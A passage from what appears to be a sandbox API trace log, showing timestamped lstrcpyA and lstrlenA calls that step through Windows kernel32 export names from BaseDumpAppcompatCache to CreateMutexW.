[0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.462] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.462] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.462] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.462] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.462] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.462] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.462] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.463] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.463] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.463] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.463] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.463] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.463] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.463] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.463] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.463] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.463] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.463] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.463] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.463] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.463] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.463] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.463] lstrlenA (lpString="BEEP") returned 4 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.463] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.463] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.463] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.464] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.464] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.464] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.464] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.464] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.464] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.464] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.464] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.464] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.464] lstrlenA (lpString="CANCELIO") returned 8 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.464] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.464] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.464] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.464] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.464] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.464] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.464] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.464] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.464] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.465] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.465] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.465] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.465] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.465] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.465] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.465] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.465] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.465] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.465] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.465] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.465] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.465] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.465] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.465] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.465] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.465] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.465] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.465] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.466] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.466] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.466] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.466] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.466] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.466] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.466] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.466] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.466] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.466] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.466] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.466] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.466] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.466] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.466] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.466] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.466] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.466] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.466] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.467] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.467] lstrlenA (lpString="COPYFILEA") returned 9 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.467] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.467] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.467] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.467] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.467] lstrlenA (lpString="COPYFILEW") returned 9 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.467] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.467] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.467] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.467] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.467] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.467] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.467] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.467] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.467] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.467] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.467] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.467] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.467] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.468] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.468] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.468] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.468] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.468] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.468] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.468] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.468] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.468] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.468] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.468] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.468] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.468] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.468] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.468] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.468] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.468] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.468] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.469] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.469] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.469] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.469] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.469] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.469] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.469] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.469] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.469] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.469] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.469] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.469] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" 